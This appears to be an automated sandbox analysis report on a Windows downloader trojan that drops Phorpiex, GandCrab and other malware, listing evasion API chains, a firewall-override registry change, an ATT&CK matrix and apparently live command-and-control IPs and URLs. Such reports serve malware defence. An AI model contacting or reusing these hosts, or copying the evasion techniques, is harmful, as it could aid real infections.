                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-4404
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeAPI coverage: 3.7 %
                            Source: C:\Windows\sysbrapsvc.exeAPI coverage: 0.9 %
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeAPI coverage: 0.9 %
                            Source: C:\Users\user\winploravr.exeAPI coverage: 6.0 %
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeAPI coverage: 9.8 %
                            Source: C:\Windows\winploravr.exeAPI coverage: 6.0 %
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040D1A04_2_0040D1A0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040D1A05_2_0040D1A0
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040D1A00_2_0040D1A0
                            Source: C:\Windows\sysbrapsvc.exe TID: 5444Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\sysbrapsvc.exe TID: 5452Thread sleep count: 105 > 30Jump to behavior
                            Source: C:\Windows\sysbrapsvc.exe TID: 5452Thread sleep time: -210000s >= -30000sJump to behavior
                            Source: C:\Windows\sysbrapsvc.exe TID: 6484Thread sleep time: -113015s >= -30000sJump to behavior
                            Source: C:\Windows\sysbrapsvc.exe TID: 5452Thread sleep count: 6126 > 30Jump to behavior
                            Source: C:\Windows\sysbrapsvc.exe TID: 5452Thread sleep time: -12252000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exe TID: 2344Thread sleep count: 46 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exe TID: 2344Thread sleep time: -46000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exe TID: 2344Thread sleep time: -4500000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00406650
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406510
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00406650
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406510
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_00406650
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406510
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00406650
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406510
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_00402020
                            Source: C:\Windows\sysbrapsvc.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Windows\sysbrapsvc.exeThread delayed: delay time: 113015Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeThread delayed: delay time: 900000Jump to behavior
                            Source: 1146722911.exe, 00000007.00000002.3857092737.0000000000910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                            Source: sysbrapsvc.exe, 00000002.00000002.3857411843.0000000000678000.00000004.00000020.00020000.00000000.sdmp, sysbrapsvc.exe, 00000002.00000002.3857411843.000000000060E000.00000004.00000020.00020000.00000000.sdmp, 1146722911.exe, 00000007.00000002.3857092737.000000000093C000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003173720.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, 330125677.exe, 0000000F.00000002.2003173720.0000000000586000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: 2006625995.exe, 0000000A.00000002.2105883206.0000000000B18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Windows\sysbrapsvc.exeAPI call chain: ExitProcess graph end nodegraph_2-4420
                            Source: C:\Windows\sysbrapsvc.exeAPI call chain: ExitProcess graph end nodegraph_4-4419
                            Source: C:\Windows\sysbrapsvc.exeAPI call chain: ExitProcess graph end nodegraph_4-4388
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeAPI call chain: ExitProcess graph end nodegraph_5-4419
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeAPI call chain: ExitProcess graph end nodegraph_5-4388
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeAPI call chain: ExitProcess graph end nodegraph_7-305
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeAPI call chain: ExitProcess graph end nodegraph_7-316
                            Source: C:\Users\user\winploravr.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\winploravr.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_00DB2638
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040A390 GetProcessHeaps,0_2_0040A390
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,7_2_00DB2638
                            Source: C:\Users\user\AppData\Local\Temp\2303012543.exeCode function: 8_2_00B51878 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,8_2_00B51878
                            Source: C:\Users\user\winploravr.exeCode function: 9_2_002A2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,9_2_002A2638
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D72FD8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,10_2_00D72FD8
                            Source: C:\Users\user\AppData\Local\Temp\2711236308.exeCode function: 13_2_00391878 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,13_2_00391878
                            Source: C:\Windows\winploravr.exeCode function: 14_2_000F2638 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,14_2_000F2638
                            Source: C:\Users\user\AppData\Local\Temp\330125677.exeCode function: 15_2_006F1888 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_006F1888
                            Source: C:\Users\user\AppData\Local\Temp\1245832676.exeCode function: 16_2_00AE1878 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,16_2_00AE1878
                            Source: C:\Users\user\AppData\Local\Temp\300129380.exeCode function: 18_2_003F19C8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,18_2_003F19C8
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: GetLocaleInfoA,strcmp,0_2_0040EBE0
                            Source: C:\Windows\sysbrapsvc.exeCode function: GetLocaleInfoA,strcmp,2_2_0040EBE0
                            Source: C:\Windows\sysbrapsvc.exeCode function: GetLocaleInfoA,strcmp,4_2_0040EBE0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: GetLocaleInfoA,strcmp,5_2_0040EBE0
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: memset,GetLocaleInfoA,strcmp,7_2_00DB1740
                            Source: C:\Users\user\winploravr.exeCode function: memset,GetLocaleInfoA,strcmp,9_2_002A1740
                            Source: C:\Windows\winploravr.exeCode function: memset,GetLocaleInfoA,strcmp,14_2_000F1740
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeCode function: 7_2_00DB2568 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00DB2568
                            Source: C:\Users\user\AppData\Local\Temp\2006625995.exeCode function: 10_2_00D71490 GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,wsprintfA,10_2_00D71490
                            Source: C:\Users\user\AppData\Local\Temp\1146722911.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Windows\sysbrapsvc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe, type: SAMPLE
                            Source: Yara matchFile source: 5.0.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.3193211493.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.sysbrapsvc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe PID: 6832, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysbrapsvc.exe PID: 5588, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sysbrapsvc.exe PID: 768, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3193211493.exe PID: 3640, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\sysbrapsvc.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3193211493.exe, type: DROPPED
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,0_2_00401470
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_00402020
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,0_2_0040DBC0
                            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exeCode function: 0_2_004013B0 CreateEventA,socket,bind,CreateThread,0_2_004013B0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040DBC0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040DBC0
                            Source: C:\Windows\sysbrapsvc.exeCode function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,5_2_00401470
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,5_2_00402020
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_0040DBC0 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,5_2_0040DBC0
                            Source: C:\Users\user\AppData\Local\Temp\3193211493.exeCode function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread,5_2_004013B0
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                            Native API
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Disable or Modify Tools
                            11
                            Input Capture
                            2
                            System Time Discovery
                            Remote Services11
                            Archive Collected Data
                            4
                            Ingress Tool Transfer
                            Exfiltration Over Other Network Medium1
                            Data Encrypted for Impact
                            CredentialsDomainsDefault Accounts2
                            Command and Scripting Interpreter
                            1
                            Windows Service
                            1
                            Windows Service
                            1
                            Obfuscated Files or Information
                            LSASS Memory2
                            System Network Connections Discovery
                            Remote Desktop Protocol11
                            Input Capture
                            2
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            Registry Run Keys / Startup Folder
                            1
                            Process Injection
                            1
                            DLL Side-Loading
                            Security Account Manager1
                            File and Directory Discovery
                            SMB/Windows Admin Shares3
                            Clipboard Data
                            1
                            Non-Standard Port
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                            Registry Run Keys / Startup Folder
                            231
                            Masquerading
                            NTDS15
                            System Information Discovery
                            Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                            Virtualization/Sandbox Evasion
                            LSA Secrets231
                            Security Software Discovery
                            SSHKeylogging23
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Process Injection
                            Cached Domain Credentials21
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                            Hidden Files and Directories
                            DCSync1
                            Application Window Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1438295 Sample: SecuriteInfo.com.Trojan.Dow... Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 60 twizt.net 2->60 62 yahoo.com 2->62 64 mta7.am0.yahoodns.net 2->64 78 Snort IDS alert for network traffic 2->78 80 Antivirus detection for URL or domain 2->80 82 Antivirus / Scanner detection for submitted sample 2->82 84 4 other signatures 2->84 9 SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe 1 1 2->9         started        13 winploravr.exe 2->13         started        15 winploravr.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 50 C:\Windows\sysbrapsvc.exe, PE32 9->50 dropped 96 Contains functionality to check if Internet connection is working 9->96 98 Drops executables to the windows directory (C:\Windows) and starts them 9->98 100 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->100 102 Contains functionality to detect sleep reduction / modifications 9->102 19 sysbrapsvc.exe 8 46 9->19         started        104 Multi AV Scanner detection for dropped file 13->104 106 Found evasive API chain (may stop execution after checking mutex) 13->106 108 Machine Learning detection for dropped file 13->108 signatures6 process7 dnsIp8 66 twizt.net 185.215.113.66, 49708, 49710, 49712 WHOLESALECONNECTIONSNL Portugal 19->66 68 189.222.182.86, 40500 UninetSAdeCVMX Mexico 19->68 70 52 other IPs or domains 19->70 42 C:\Users\user\AppData\Local\...\330125677.exe, PE32 19->42 dropped 44 C:\Users\user\AppData\...\3193211493.exe, PE32 19->44 dropped 46 C:\Users\user\AppData\Local\...\300129380.exe, PE32 19->46 dropped 48 4 other malicious files 19->48 dropped 88 Antivirus detection for dropped file 19->88 90 Multi AV Scanner detection for dropped file 19->90 92 Found evasive API chain (may stop execution after checking mutex) 19->92 94 6 other signatures 19->94 24 1146722911.exe 2 37 19->24         started        29 3193211493.exe 19->29         started        31 2006625995.exe 19->31         started        33 2 other processes 19->33 file9 signatures10 process11 dnsIp12 72 91.202.233.141, 49726, 49727, 49729 M247GB Russian Federation 24->72 74 193.233.132.177, 49728, 49731, 49734 FREE-NET-ASFREEnetEU Russian Federation 24->74 52 C:\Windows\winploravr.exe, PE32 24->52 dropped 54 C:\Users\user\winploravr.exe, PE32 24->54 dropped 56 C:\Users\user\AppData\...\2711236308.exe, PE32 24->56 dropped 58 2 other malicious files 24->58 dropped 110 Multi AV Scanner detection for dropped file 24->110 112 Found evasive API chain (may stop execution after checking mutex) 24->112 114 Machine Learning detection for dropped file 24->114 116 Drops PE files to the user root directory 24->116 35 2303012543.exe 13 24->35         started        38 2711236308.exe 24->38         started        40 1245832676.exe 24->40         started        118 Antivirus detection for dropped file 29->118 120 Contains functionality to check if Internet connection is working 29->120 122 Contains functionality to detect sleep reduction / modifications 29->122 76 mta7.am0.yahoodns.net 67.195.228.94, 25 YAHOO-GQ1US United States 31->76 124 Contains functionality to determine the online IP of the system 31->124 126 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->126 file13 signatures14 process15 signatures16 86 Multi AV Scanner detection for dropped file 35->86

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe79%ReversingLabsWin32.Trojan.MintZard
                            SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe100%AviraHEUR/AGEN.1360619
                            SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Windows\sysbrapsvc.exe100%AviraHEUR/AGEN.1360619
                            C:\Users\user\AppData\Local\Temp\3193211493.exe100%AviraHEUR/AGEN.1360619
                            C:\Users\user\AppData\Local\Temp\330125677.exe100%Joe Sandbox ML
                            C:\Users\user\winploravr.exe100%Joe Sandbox ML
                            C:\Windows\sysbrapsvc.exe100%Joe Sandbox ML
                            C:\Users\user\winploravr.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\2006625995.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\3193211493.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1146722911.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1146722911.exe96%ReversingLabsWin32.Worm.Phorpiex
                            C:\Users\user\AppData\Local\Temp\1245832676.exe30%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\2303012543.exe30%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\2711236308.exe30%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Local\Temp\300129380.exe38%ReversingLabsWin32.Ransomware.GandCrab
                            C:\Users\user\AppData\Local\Temp\3193211493.exe79%ReversingLabsWin32.Trojan.MintZard
                            C:\Users\user\AppData\Local\Temp\330125677.exe62%ReversingLabsWin32.Trojan.Zusy
                            C:\Users\user\winploravr.exe96%ReversingLabsWin32.Worm.Phorpiex
                            C:\Windows\sysbrapsvc.exe79%ReversingLabsWin32.Trojan.MintZard
                            C:\Windows\winploravr.exe96%ReversingLabsWin32.Worm.Phorpiex
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://193.233.132.177/_2g0%Avira URL Cloudsafe
                            http://185.215.113.66/_20%Avira URL Cloudsafe
                            http://185.215.113.66/reg.php?s=%s0%Avira URL Cloudsafe
                            http://193.233.132.177/2S0%Avira URL Cloudsafe
                            http://185.215.113.66/_32_p00%Avira URL Cloudsafe
                            http://185.215.113.66/_10%Avira URL Cloudsafe
                            http://185.215.113.66/_36o0%Avira URL Cloudsafe
                            http://91.202.233.141/10%Avira URL Cloudsafe
                            http://185.215.113.66/_30%Avira URL Cloudsafe
                            http://91.202.233.141/20%Avira URL Cloudsafe
                            http://91.202.233.141/50%Avira URL Cloudsafe
                            http://193.233.132.177/4#0%Avira URL Cloudsafe
                            http://193.233.132.177/3C0%Avira URL Cloudsafe
                            http://91.202.233.141/30%Avira URL Cloudsafe
                            http://91.202.233.141/40%Avira URL Cloudsafe
                            http://91.202.233.141/_3yh0%Avira URL Cloudsafe
                            http://193.233.132.177/3h.dll0%Avira URL Cloudsafe
                            http://185.215.113.66/_3qh0%Avira URL Cloudsafe
                            http://91.202.233.141/60%Avira URL Cloudsafe
                            http://twizt.net/ALLSTATAo100%Avira URL Cloudphishing
                            http://91.202.233.141/_11N:we0%Avira URL Cloudsafe
                            http://185.215.113.66/3:(0%Avira URL Cloudsafe
                            http://185.215.113.66/5P100%Avira URL Cloudmalware
                            http://193.233.132.177/3770%Avira URL Cloudsafe
                            http://twizt.net/100%Avira URL Cloudphishing
                            http://twizt.net/ALLSTATAopen%temp%%s100%Avira URL Cloudphishing
                            http://185.215.113.66/1http://185.215.113.66/2http://185.215.113.66/3http://185.215.113.66/4http://10%Avira URL Cloudsafe
                            http://91.202.233.141/6P0%Avira URL Cloudsafe
                            http://91.202.233.141/_1K0%Avira URL Cloudsafe
                            http://185.215.113.66/_1Ih0%Avira URL Cloudsafe
                            http://185.215.113.66/40%Avira URL Cloudsafe
                            http://185.215.113.66/50%Avira URL Cloudsafe
                            http://91.202.233.141/5G40%Avira URL Cloudsafe
                            http://185.215.113.66/30%Avira URL Cloudsafe
                            http://91.202.233.141/_160%Avira URL Cloudsafe
                            http://185.215.113.66/20%Avira URL Cloudsafe
                            http://91.202.233.141/5e0%Avira URL Cloudsafe
                            http://185.215.113.66/2H100%Avira URL Cloudmalware
                            http://185.215.113.66/2O100%Avira URL Cloudmalware
                            http://185.215.113.66/_1/0%Avira URL Cloudsafe
                            http://185.215.113.66/10%Avira URL Cloudsafe
                            http://185.215.113.66/6100%Avira URL Cloudmalware
                            http://91.202.233.141/_110%Avira URL Cloudsafe
                            http://91.202.233.141/5V0%Avira URL Cloudsafe
                            http://185.215.113.66/reg.php?s=%sMozilla/5.00%Avira URL Cloudsafe
                            http://185.215.113.66/61(0%Avira URL Cloudsafe
                            http://91.202.233.141/5Y0%Avira URL Cloudsafe
                            http://91.202.233.141/6.F;0%Avira URL Cloudsafe
